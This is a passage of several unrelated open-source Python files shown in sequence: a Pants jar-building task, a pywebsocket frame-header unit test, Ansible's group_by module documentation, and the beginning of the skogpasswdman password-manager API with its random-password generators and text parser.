manifest_path = os.path.join(self._src, manifest_relpath)
if os.path.isfile(manifest_path):
manifest_entry = Jar.FileSystemEntry(manifest_path, dest=Manifest.PATH)
non_manifest_chroot = os.path.join(safe_mkdtemp(), 'chroot')
shutil.copytree(self._src, non_manifest_chroot)
os.unlink(os.path.join(non_manifest_chroot, manifest_relpath))
return Jar.FileSystemEntry(non_manifest_chroot), manifest_entry
else:
return self, None
def materialize(self, _):
return self._src
class MemoryEntry(Entry):
"""An entry backed by an in-memory sequence of bytes."""
def __init__(self, dest, contents):
super(Jar.MemoryEntry, self).__init__(dest)
self._contents = contents
def materialize(self, scratch_dir):
fd, path = tempfile.mkstemp(dir=scratch_dir)
try:
os.write(fd, self._contents)
finally:
os.close(fd)
return path
def __init__(self, path):
self._path = path
self._entries = []
self._jars = []
self._manifest_entry = None
self._main = None
self._classpath = []
@property
def classpath(self):
"""The Class-Path entry of jar's Manifest."""
return self._classpath
@property
def path(self):
"""The path to jar itself."""
return self._path
def main(self, main):
"""Specifies a Main-Class entry for this jar's manifest.
:param string main: a fully qualified class name
"""
if not main or not isinstance(main, string_types):
raise ValueError('The main entry must be a non-empty string')
self._main = main
def append_classpath(self, classpath):
"""Specifies a Class-Path entry for this jar's manifest.
If called multiple times, new entry will be appended to the existing classpath.
:param iterable classpath: a list of paths
"""
self._classpath = self._classpath + maybe_list(classpath)
def write(self, src, dest=None):
"""Schedules a write of the file at ``src`` to the ``dest`` path in this jar.
If the ``src`` is a file, then ``dest`` must be specified.
If the ``src`` is a directory then by default all descendant files will be added to the jar as
entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
descendant's relative path to form its jar entry path.
:param string src: the path to the pre-existing source file or directory
:param string dest: the path the source file or directory should have in this jar
"""
if not src or not isinstance(src, string_types):
raise ValueError('The src path must be a non-empty string, got {} of type {}.'.format(
src, type(src)))
if dest and not isinstance(dest, string_types):
raise ValueError('The dest entry path must be a non-empty string, got {} of type {}.'.format(
dest, type(dest)))
if not os.path.isdir(src) and not dest:
raise self.Error('Source file {} must have a jar destination specified'.format(src))
self._add_entry(self.FileSystemEntry(src, dest))
def writestr(self, path, contents):
"""Schedules a write of the file ``contents`` to the given ``path`` in this jar.
:param string path: the path to write the contents to in this jar
:param string contents: the raw byte contents of the file to write to ``path``
"""
if not path or not isinstance(path, string_types):
raise ValueError('The path must be a non-empty string')
if contents is None or not isinstance(contents, binary_type):
raise ValueError('The contents must be a sequence of bytes')
self._add_entry(self.MemoryEntry(path, contents))
def _add_entry(self, entry):
non_manifest, manifest = entry.split_manifest()
if manifest:
self._manifest_entry = manifest
if non_manifest:
self._entries.append(non_manifest)
def writejar(self, jar):
"""Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.
:param string jar: the path to the pre-existing jar to graft into this jar
"""
if not jar or not isinstance(jar, string_types):
raise ValueError('The jar path must be a non-empty string')
self._jars.append(jar)
@contextmanager
def _render_jar_tool_args(self, options):
"""Format the arguments to jar-tool.
:param Options options:
"""
args = []
with temporary_dir() as manifest_stage_dir:
# relativize urls in canonical classpath, this needs to be stable too therefore
# do not follow the symlinks because symlinks may vary from platform to platform.
classpath = relativize_classpath(self.classpath,
os.path.dirname(self._path),
followlinks=False)
def as_cli_entry(entry):
src = entry.materialize(manifest_stage_dir)
return '{}={}'.format(src, entry.dest) if entry.dest else src
files = [as_cli_entry(entry) for entry in self._entries] if self._entries else []
jars = self._jars or []
with safe_args(classpath, options, delimiter=',') as classpath_args:
with safe_args(files, options, delimiter=',') as files_args:
with safe_args(jars, options, delimiter=',') as jars_args:
# If you specify --manifest to jar-tool you cannot specify --main.
if self._manifest_entry:
manifest_file = self._manifest_entry.materialize(manifest_stage_dir)
else:
manifest_file = None
if self._main and manifest_file:
main_arg = None
with open(manifest_file, 'a') as f:
f.write("Main-Class: {}\n".format(self._main))
else:
main_arg = self._main
if main_arg:
args.append('-main={}'.format(self._main))
if classpath_args:
args.append('-classpath={}'.format(','.join(classpath_args)))
if manifest_file:
args.append('-manifest={}'.format(manifest_file))
if files_args:
args.append('-files={}'.format(','.join(files_args)))
if jars_args:
args.append('-jars={}'.format(','.join(jars_args)))
yield args
class JarTask(NailgunTask):
"""A baseclass for tasks that need to create or update jars.
All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
invocations.
:API: public
"""
@classmethod
def subsystem_dependencies(cls):
return super(JarTask, cls).subsystem_dependencies() + (JarTool,)
@classmethod
def prepare(cls, options, round_manager):
super(JarTask, cls).prepare(options, round_manager)
JarTool.prepare_tools(round_manager)
@staticmethod
def _flag(bool_value):
return 'true' if bool_value else 'false'
_DUPLICATE_ACTION_TO_NAME = {
Duplicate.SKIP: 'SKIP',
Duplicate.REPLACE: 'REPLACE',
Duplicate.CONCAT: 'CONCAT',
Duplicate.CONCAT_TEXT: 'CONCAT_TEXT',
Duplicate.FAIL: 'THROW',
}
@classmethod
def _action_name(cls, action):
name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
if name is None:
raise ValueError('Unrecognized duplicate action: {}'.format(action))
return name
def __init__(self, *args, **kwargs):
super(JarTask, self).__init__(*args, **kwargs)
self.set_distribution(jdk=True)
# TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
# control.
@contextmanager
def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
"""Yields a Jar that will be written when the context exits.
:API: public
:param string path: the path to the jar file
:param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default; ie:
update the pre-existing jar at ``path``
:param bool compressed: entries added to the jar should be compressed; ``True`` by default
:param jar_rules: an optional set of rules for handling jar exclusions and duplicates
"""
jar = Jar(path)
try:
yield jar
except jar.Error as e:
raise TaskError('Failed to write to jar at {}: {}'.format(path, e))
with jar._render_jar_tool_args(self.get_options()) as args:
if args: # Don't build an empty jar
args.append('-update={}'.format(self._flag(not overwrite)))
args.append('-compress={}'.format(self._flag(compressed)))
jar_rules = jar_rules or JarRules.default()
args.append('-default_action={}'.format(self._action_name(jar_rules.default_dup_action)))
skip_patterns = []
duplicate_actions = []
for rule in jar_rules.rules:
if isinstance(rule, Skip):
skip_patterns.append(rule.apply_pattern)
elif isinstance(rule, Duplicate):
duplicate_actions.append('{}={}'.format(
rule.apply_pattern.pattern, self._action_name(rule.action)))
else:
raise ValueError('Unrecognized rule: {}'.format(rule))
if skip_patterns:
args.append('-skip={}'.format(','.join(p.pattern for p in skip_patterns)))
if duplicate_actions:
args.append('-policies={}'.format(','.join(duplicate_actions)))
args.append(path)
if JarTool.global_instance().run(context=self.context, runjava=self.runjava, args=args):
raise TaskError('jar-tool failed')
class JarBuilderTask(JarTask):
class JarBuilder(AbstractClass):
"""A utility to aid in adding the classes and resources associated with targets to a jar.
:API: public
"""
@staticmethod
def _add_agent_manifest(agent, manifest):
# TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
if agent.premain:
manifest.addentry('Premain-Class', agent.premain)
if agent.agent_class:
manifest.addentry('Agent-Class', agent.agent_class)
if agent.can_redefine:
manifest.addentry('Can-Redefine-Classes', 'true')
if agent.can_retransform:
manifest.addentry('Can-Retransform-Classes', 'true')
if agent.can_set_native_method_prefix:
manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
@staticmethod
def _add_manifest_entries(jvm_binary_target, manifest):
"""Add additional fields to MANIFEST.MF as declared in the ManifestEntries structure.
:param JvmBinary jvm_binary_target:
:param Manifest manifest:
"""
for header, value in six.iteritems(jvm_binary_target.manifest_entries.entries):
manifest.addentry(header, value)
@staticmethod
def prepare(round_manager):
"""Prepares the products needed to use `create_jar_builder`.
This method should be called during task preparation to ensure the classes and resources
needed for jarring targets are mapped by upstream tasks that generate these.
Later, in execute context, the `create_jar_builder` method can be called to get back a
prepared ``JarTask.JarBuilder`` ready for use.
"""
round_manager.require_data('runtime_classpath')
def __init__(self, context, jar):
self._context = context
self._jar = jar
self._manifest = Manifest()
def add_target(self, target, recursive=False):
"""Adds the classes and resources for a target to an open jar.
:param target: The target to add generated classes and resources for.
:param bool recursive: `True` to add classes and resources for the target's transitive
internal dependency closure.
:returns: `True` if the target contributed any files - manifest entries, classfiles or
resource files - to this jar.
:rtype: bool
"""
products_added = False
classpath_products = self._context.products.get_data('runtime_classpath')
# TODO(John Sirois): Manifest handling is broken. We should be tracking state and failing
# fast if any duplicate entries are added; ie: if we get a second binary or a second agent.
if isinstance(target, JvmBinary):
self._add_manifest_entries(target, self._manifest)
products_added = True
# Ensure that JavaAgent entries are added to the manifest. Either by adding all of the
# transitive JavaAgent deps, if recursive, or by adding the root target, if the root target
# is itself a JavaAgent.
if recursive:
agents = [t for t in target.closure() if isinstance(t, JavaAgent)]
if len(agents) > 1:
raise TaskError('Only 1 agent can be added to a jar, found {} for {}:\n\t{}'
.format(len(agents),
target.address.reference(),
'\n\t'.join(agent.address.reference() for agent in agents)))
elif agents:
self._add_agent_manifest(agents[0], self._manifest)
products_added = True
elif isinstance(target, JavaAgent):
self._add_agent_manifest(target, self._manifest)
products_added = True
# In the transitive case we'll gather internal resources naturally as dependencies, but in the
# non-transitive case we need to manually add these special (in the context of jarring)
# dependencies.
targets = target.closure(bfs=True) if recursive else [target]
if not recursive and target.has_resources:
targets += target.resources
# We only gather internal classpath elements per our contract.
target_classpath = ClasspathUtil.internal_classpath(targets,
classpath_products)
for entry in target_classpath:
if ClasspathUtil.is_jar(entry):
self._jar.writejar(entry)
products_added = True
elif ClasspathUtil.is_dir(entry):
for rel_file in ClasspathUtil.classpath_entries_contents([entry]):
self._jar.write(os.path.join(entry, rel_file), rel_file)
products_added = True
else:
# non-jar and non-directory classpath entries should be ignored
pass
return products_added
def commit_manifest(self, jar):
"""Updates the manifest in the jar being written to.
Typically done right before closing the .jar. This gives a chance for all targets to bundle
in their contributions to the manifest.
"""
if not self._manifest.is_empty():
jar.writestr(Manifest.PATH, self._manifest.contents())
@classmethod
def prepare(cls, options, round_manager):
super(JarBuilderTask, cls).prepare(options, round_manager)
cls.JarBuilder.prepare(round_manager)
@contextmanager
def create_jar_builder(self, jar):
"""Creates a ``JarTask.JarBuilder`` ready for use.
This method should be called during in `execute` context and only after ensuring
`JarTask.JarBuilder.prepare` has already been called in `prepare` context.
:param jar: An opened ``pants.backend.jvm.tasks.jar_task.Jar`.
"""
builder = self.JarBuilder(self.context, jar)
yield builder
builder.commit_manifest(jar)
|
espadrine/opera | refs/heads/master | chromium/src/third_party/pywebsocket/src/test/test_stream.py | 496 | #!/usr/bin/env python
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for stream module."""
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import common
from mod_pywebsocket import stream
class StreamTest(unittest.TestCase):
"""A unittest for stream module."""
def test_create_header(self):
# more, rsv1, ..., rsv4 are all true
header = stream.create_header(common.OPCODE_TEXT, 1, 1, 1, 1, 1, 1)
self.assertEqual('\xf1\x81', header)
# Maximum payload size
header = stream.create_header(
common.OPCODE_TEXT, (1 << 63) - 1, 0, 0, 0, 0, 0)
self.assertEqual('\x01\x7f\x7f\xff\xff\xff\xff\xff\xff\xff', header)
# Invalid opcode 0x10
self.assertRaises(ValueError,
stream.create_header,
0x10, 0, 0, 0, 0, 0, 0)
# Invalid value 0xf passed to more parameter
self.assertRaises(ValueError,
stream.create_header,
common.OPCODE_TEXT, 0, 0xf, 0, 0, 0, 0)
# Too long payload_length
self.assertRaises(ValueError,
stream.create_header,
common.OPCODE_TEXT, 1 << 63, 0, 0, 0, 0, 0)
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
|
tersmitten/ansible-modules-core | refs/heads/devel | inventory/group_by.py | 161 | # -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: group_by
short_description: Create Ansible groups based on facts
description:
- Use facts to create ad-hoc groups that can be used later in a playbook.
version_added: "0.9"
options:
key:
description:
- The variables whose values will be used as groups
required: true
author: "Jeroen Hoekx (@jhoekx)"
notes:
- Spaces in group names are converted to dashes '-'.
'''
EXAMPLES = '''
# Create groups based on the machine architecture
- group_by: key=machine_{{ ansible_machine }}
# Create groups like 'kvm-host'
- group_by: key=virt_{{ ansible_virtualization_type }}_{{ ansible_virtualization_role }}
'''
|
oskar-skog/skogpasswdman | refs/heads/master | skogpasswdmanapi.py | 1 | # -*- coding: utf-8 -*-
copywrong = """
Copyright (c) 2013-2016, Oskar Skog <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
__doc__ = """
skogpasswdmanapi - functions and classes used by skogpasswdman
Python 2/3 compatibility functions
----------------------------------
is_anystr(x)
is_bytestr(x)
is_unicodestr(x)
u(x)
b(x)
is_int(x)
is_num(x)
Classes
-------
passwd(common_data)
honeypot(common_data)
common_data() Internally used.
RNGs
----
get10(length) Internally used.
get64(length) Internally used.
getint(a, b) Internally used.
randomize(method, minlength, maxlength)
Misc.
-----
open_rng() Internally used.
unquote(x)
undo(passwdobj,honeypotobj)
redo(passwdobj,honeypotobj)
ckmkdir(d) Internally used. Not in man-page.
ckmkfile(f, content) Internally used. Not in man-page.
ope = os.path.expanduser Internally used. Not in man-page.
Progress-bar
------------
class progress_bar()
no_pb()
no_pb_f() Internally used.
Exceptions
----------
err_norandom(Exception)
err_nolength(Exception)
err_loaderr(Exception)
err_notfound(Exception)
err_duplicate(Exception)
err_idiot(Exception)
err_nometa(Exception)
NOTES
-----
What I call strings is really:
- Python 2: unicode
- Python 3: str
The `pb`-keyword argument, seen in lots of functions, expects a
`progress_bar`-object.
"""
import xml.etree.ElementTree as XML
import os.path
import time
import logging
import string
import sys
import locale
import fcntl
import re
class err_norandom(Exception):
"""class err_norandom(Exception)
Cannot open '/dev/random', cannot open '/dev/urandom'.
"""
pass
class err_nolength(Exception):
"""class err_nolength(Exception) - Invalid length (get10()
or get64()).
"""
pass
class err_loaderr(Exception):
"""class err_loaderr(Exception) - Failure to load data file (XML)."""
pass
class err_notfound(Exception):
"""class err_notfound(Exception)
The record in object.data cannot be found."""
pass
class err_duplicate(Exception):
"""class err_duplicate(Exception)
The value to be added already exist in object.data."""
pass
class err_idiot(Exception):
"""class err_idiot(Exception) - Incorrect usage."""
pass
class err_nometa(Exception):
"""class err_nometa(Exception) - Meta-data is required."""
pass
def is_int(x):
"""is_int(x) = True, False (is x int or long)"""
if isinstance(x, int):
return True
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, long)
return False
def is_num(x):
"""is_num(x) = True, False (is x a number)"""
return is_int(x) or isinstance(x, float)
def is_bytestr(x):
"""is_bytestr(x) = True, False (is x encoded/bytes)"""
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, str)
else:
return isinstance(x, bytes)
def is_unicodestr(x):
"""is_unicodestr(x) = True, False (is x decoded/unicode)"""
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, unicode)
else:
return isinstance(x, str)
def is_anystr(x):
"""is_anystr(x) = True, False (is x any kind of string)"""
if isinstance(x, str):
return True
v, f, f, f, f = sys.version_info
if v == 2:
return isinstance(x, unicode)
else:
return isinstance(x, bytes)
def u(x):
"""u(x) return a unicode/decoded string"""
assert is_anystr(x)
if not is_unicodestr(x):
return x.decode(code)
else:
return x
def b(x):
"""b(x) return a byte/encoded string"""
assert is_anystr(x)
if not is_bytestr(x):
return x.encode(code)
else:
return x
def b2u3(x):
"""b2u3(x)
b(x) if Python 2.x
u(x) if Python 3.x
"""
v, f, f, f, f = sys.version_info
if v == 2:
return b(x)
else:
return u(x)
ope = os.path.expanduser
def no_pb_f(percent, data):
"""no_pb_f(percent, data)
The actual function used by a progress bar created by `no_pb`.
"""
pass
def no_pb():
"""no_pb()
Return an invisible progress_bar.
"""
return progress_bar(0.0, 100.0, no_pb_f, None)
def open_rng():
"""open_rng() - Open random(4) or urandom(4), returns an open file.
ERRORS
err_norandom(Exception) Cannot open random(4) or urandom.
"""
# Open /dev/urandom if /dev/random cannot be opened.
try:
f = open('/dev/random', 'rb')
except:
try:
f = open('/dev/urandom', 'rb')
except:
raise err_norandom('Cannot open "/dev/random" or "/dev/urandom".')
return f
def get64(length, pb=None):
"""get64(length)
Returns a random string containing A-Z a-z 0-9 underscore and
exclamation mark, with the length `length`.
ERRORS
err_nolength(Exception) Invalid `length`.
err_norandom open_rng()
"""
# rng The random number generator '/dev/random'.
# passwd The password to be returned.
# number Integer used as a buffer/pipe between rng and passwd.
# bits The amount of bits left in 'number'.
if not is_int(length): # Check type.
raise err_idiot('get64 called with non-integer length.')
logging.info("get64: length={0}".format(length))
if length < 1:
raise err_nolength('get64 called with length < 1.')
if pb is None:
pb = no_pb()
letters=("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef" +
"ghijklmnopqrstuvwxyz0123456789!_")
passwd, bits, number = '', 0, 0
rng = open_rng()
while len(passwd) < length: # Main loop.
pb.progress(float(len(passwd))/float(length) * 100.0)
if bits < 6:
logging.info("get64: Need more random bits.")
number |= ord(rng.read(1)) << bits # Prepend the bits in number
# with a random byte.
bits += 8
passwd += letters[number % 64] # Use 6 bits to pick a letter and...
# ...append.
number >>= 6
bits -= 6
logging.info("get64: Added char {0}/{1}.".format(len(passwd), length))
rng.close()
del letters, bits, number, rng
return u(passwd)
def get10(length, pb=None):
"""get10(length)
Returns a random string containing 0-9, with the length `length`.
Raises the same exceptions as get64().
"""
# rng The random number generator '/dev/random'.
# passwd The password to be returned.
# number Integer used as a buffer/pipe between rng and passwd.
# bits The amount of bits left in 'number'.
if not is_int(length): # Check type.
raise err_nolength('get10 called with non-integer length.')
logging.info("get10: length={0}".format(length))
if length < 1:
raise err_nolength('get10 called with length < 1.')
if pb is None:
pb = no_pb()
passwd, bits, number = '', 0, 0
rng = open_rng()
while len(passwd) < length: # Main loop.
pb.progress(float(len(passwd))/float(length) * 100.0)
if bits < 4:
# Prepend the bits in `number` with a random byte.
logging.info("get10: Need more random bits.")
number |= ord(rng.read(1)) << bits
bits += 8
if (number%16) < 10:
# I don't want 0...5 to occur more frequently than 6...9.
passwd += chr(number%16 + 48) # digits ASCII
logging.info(
"get10: Added char {0}/{1}.".format(len(passwd), length))
else:
logging.info("get10: Bad nibble.")
number >>= 4 # Next nibble.
bits -= 4
rng.close()
del rng, bits, number
return u(passwd)
def getint(a, b, pb=None):
"""getint(a, b)
Return random integer with value a from `a` to `b` - 1.
"""
assert is_int(a) and is_int(b)
if b <= a:
raise err_nolength("b <= a")
if pb is None:
pb = no_pb()
rng = open_rng()
reqbits = bits = number = smallnum = 0
while (1 << reqbits) < (b - a):
reqbits += 1 # How many bits are required?
number = b-a + 1 # Force loop.
while number >= (b - a): # Get a number in range.
logging.info("getint: Getting number...")
bits = number = 0
while bits < reqbits: # Need more.
if (reqbits - bits) < 8: # Prepend a few bits.
smallnum = ord(rng.read(1)) # Get byte.
smallnum %= 1<<(reqbits - bits) # Remove overflow bits.
number |= smallnum << bits # Prepend.
else: # Prepend a whole byte.
number |= ord(rng.read(1)) << bits
pb.progress(float(bits)/float(reqbits) * 100.0) # Progress bar.
bits += 8
rng.close()
return number + a
def unquote(x, esc=False):
"""unquote(x, esc=False) - Returns `x` without surrounding quotes.
Setting `esc` to `True` will make `unquote` return every character
behind a backslash without parsing them.
\'\"
\n\t\b\e Does not work.
>>> #This is Python 3.x
>>> import skogpasswdmanapi as api
>>> api.unquote('\t"Hello, world!" ')
'Hello, world!'
>>> api.unquote(' "Good bye cruel world!')
' "Good bye cruel world!'
>>> api.unquote('foobar')
'foobar'
>>> api.unquote("'foobar'")
'foobar'
"""
assert is_unicodestr(x)
the_output, the_input = "", []
for c in x:
the_input.append(c)
while True: # Skip all the whitespace.
try:
c = the_input.pop(0)
except:
return x
if not c in string.whitespace:
if c in "'\"": # First quote.
quote = c
break
return x # Not quoted.
while True: # Quoted string.
try:
c = the_input.pop(0)
except:
return x # String with a quote inside.
if esc and c == '\\':
# Simple escapes.
try:
c = the_input.pop(0)
except:
return x # String with a quote inside.
the_output += c
continue
if c == quote:
break # Possible end of string.
the_output += c
while True: # Skip the tail.
try:
c = the_input.pop(0)
except:
return the_output # Done.
if not c in string.whitespace:
return x # Bad tail.
def randomize(method, minlength, maxlength, pb=None):
"""randomize(method, minlength, maxlength)
Return random string with a length >= `minlength` and
<= `maxlength`.
`method`:
- "10" -> use get10()
- "64" -> use get64()
"""
assert is_int(minlength) and is_int(maxlength)
assert is_anystr(method)
if pb is not None:
getint_pb = pb.minibar(0.0, 10.0)
get6410_pb = pb.minibar(10.0, 100.0)
else:
getint_pb = get6410_pb = None
length = getint(minlength, maxlength+1, getint_pb)
# Even the length should be randomized.
if method == "10":
return get10(length, get6410_pb)
elif method == "64":
return get64(length, get6410_pb)
else:
raise err_nometa("weird 'method'")
class progress_bar():
"""class progress_bar()
pb = progress_bar(start=0.0, stop=100.0, function, data=None)
pb.progress(percent)
pb2 = pb.minibar(start, stop)
brain_dead_object = no_pb()
brain_dead_object.progress(percent)
brain_dead_object2 = brain_dead_object.minibar(start, stop)
Methods
-------
- progress(percent)
- minibar(start, stop)
start, stop and percent are floating point numbers in the range 0...100.
"""
def __init__(self, start, stop, function, data=None):
"""__init__(self, start, stop, function, data=None)
All values are float.
The values are internally in the range 0...1.
They are externally in the range 0...100.
`start` and `stop` is where 0% and 100% really is.
`function` is the function used to show progress.
`function` is ``function(percent, data)``.
`function`'s `percent` is the total progress in the range
0...100.
`function`'s `data` is the `progress_bar`-object's `data`.
`data` defaults to None and can be whatever you want.
"""
self.start = start/100.0
self.stop = stop/100.0
self.function = function
self.data = data
# Full range.
self.full = self.stop - self.start
def progress(self, percent):
"""progress(self, percent)
`percent` is in the range 0...100.
Show progress inside `self`'s range.
"""
if percent < 0.0:
percent = 0.0
if percent > 100.0:
percent = 100.0
real_percent = self.start + (percent/100.0 * self.full)
self.function(real_percent*100.0, self.data)
def minibar(self, start, stop):
"""progress_bar.minibar(self, start, stop)
A progress-bar that is a part of another (the parent)
progress-bar.
`start` and `stop` is where local-0% and local-100% is in the
parent.
>>> import skogpasswdmanapi as api
>>> def simple_progress(percent, data):
... print(percent)
...
>>> pb = progress_bar(0.0, 100.0, simple_progress)
>>> pb.progress(0.0)
0.0
>>> pb.progress(50.0)
50.0
>>> pb.progress(100.0)
100.0
>>> minipb = pb.minibar(50.0, 100.0)
>>> minipb.progress(0.0)
50.0
>>> minipb.progress(50.0)
75.0
>>> minipb.progress(100.0)
100.0
"""
start /= 100.0
stop /= 100.0
return progress_bar(
(self.start + start*self.full) * 100.0,
(self.start + stop*self.full) * 100.0,
self.function,
self.data)
def parsetext_getvalue(s, *args):
'''
getvalue(self, s)
What is `s`?
Returns eval(s).
Single quoted: string
Triple quoted: string
int, float, complex
True, False, None
variable defined in the dicts args
'''
# Remove leading whitespace.
# Numbers
# Variable
for i, c in enumerate(s):
if c not in ' \t':
break
s = s[i:]
## Strings.
#for n, sq, dq in [(3, "'''", '"""'), (1, "'", '"')]:
# if len(s) >= n * 2:
# if s[:n] in (sq, dq) and s[:n] == s[-n:]:
# return re.sub('\x01', "'", re.sub('\x02', '"', s[n:-n]))
## Numbers.
#numlist = []
#numtypes = ('int', 'float', 'complex')
#for x in numtypes:
# try:
# v = eval('{0}("{1}")'.format(x, s))
# except ValueError:
# v = None
# numlist.append(v)
## Choose the simplest.
#b = numlist[-1]
#for a in reversed(numlist[:-1]):
# if a != b:
# break
# b = a
#if b != None:
# return b
# The commented code above was from before the use of eval().
# They will come back when this can do stuff like get the value of a
# item in a list or dictionary without using eval().
# Variables
# None, True and False are added to the list of variables.
# It is only used internally, so eval() is not a big risk.
final = {}
for x in reversed(args):
for y in x:
try:
final[y]
except KeyError:
final[y] = x[y]
try:
return eval(s, final)
except:
raise SyntaxError('parsetext_getvalue: What is `{0}` ?'.format(s))
def parsetext_untext(text):
'''
for indent, line in untext(self, text)
`indent` is an integer.
`line` is a string.
Escapes are translated.
Triple quoted strings have all of their lines joined with
newlines into a single output-line.
chr(1) is an escaped single quote.
chr(2) is an escaped double quote.
chr(3) is temporarily triple-single quote
chr(4) is temporarily triple-double quote
Comments, blank lines and trailing whitespace are removed.
'''
badbad = [(1, 'SOH'), (2, 'STX'), (3, 'ETX'), (4, 'EOT')]
for x in text:
for y, s in badbad:
if x == y:
raise SyntaxError(
'parsetext_untext: Choked on a {0}'.format(s))
# Backslash-newline.
skip = False
tmp_text = ''
for i, c in enumerate(text):
if skip:
skip = False
continue
if c == '\\':
skip = True
if text[i + 1] != '\n':
tmp_text += text[i:i + 2]
else:
tmp_text += c
# Triple quotes.
text = re.sub("'''", chr(3), re.sub('"""', chr(4), tmp_text))
tmp_text = ''
quote = ''
raw = False
for c in text:
if c == quote:
# End-quote.
if quote == chr(3):
tmp_text += "'''"
else:
tmp_text += '"""'
quote = ''
# Setting `raw` to `False` will make it drop the 'r'.
raw = 0
elif c in (chr(3), chr(4)):
# Start quote.
if c == chr(3):
tmp_text += "'''"
else:
tmp_text += '"""'
quote = c
elif quote:
# Quoted.
if c == '\n':
tmp_text += '\\n'
else:
if raw == 1 and c == '\\':
tmp_text += '\\\\'
elif raw == 2 and c == '\\':
tmp_text += '\\\\\\\\'
else:
tmp_text += c
else:
if raw == 1:
# Last character was a 'r' that didn't start a r'''*'''.
tmp_text += 'r'
raw = 0
if raw == 2:
tmp_text += 'R'
raw = 0
# raw and super-raw.
if c == 'r':
# If the following character is \x03
# or \x04: start a r'''*'''.
raw = 1
elif c == 'R':
raw = 2
else:
tmp_text += c
# Lines and escapes.
raw_lines = tmp_text.split('\n')
escaped_lines = []
del text
del tmp_text
escapes = {
'\\': '\\',
'n': '\n',
"'": chr(1),
'"': chr(2),
't': '\t'
}
for line in raw_lines:
skip = False
tmp_line = ''
for i, c in enumerate(line):
if skip:
skip = False
continue
if c == '\\':
skip = True
try:
tmp_line += escapes[line[i + 1]]
except KeyError:
raise SyntaxError(
"parsetext_untext: Unknown escape '{0}'".format(
'\\' + line[i + 1]))
else:
tmp_line += c
escaped_lines.append(tmp_line)
# Comments.
uncommented_lines = []
quote = ''
for line in escaped_lines:
for i, c in enumerate(line):
if quote:
if c == quote:
quote = ''
continue
else:
if c in ('"', "'"):
quote = c
continue
if c == '#':
uncommented_lines.append(line[:i])
break
else:
uncommented_lines.append(line)
del escaped_lines
# Blanks.
nonblanks = []
for line in uncommented_lines:
for c in line:
if c not in '\t ':
nonblanks.append(line)
break
del uncommented_lines
# Remove trailing whitespace.
trailfree = []
for line in nonblanks:
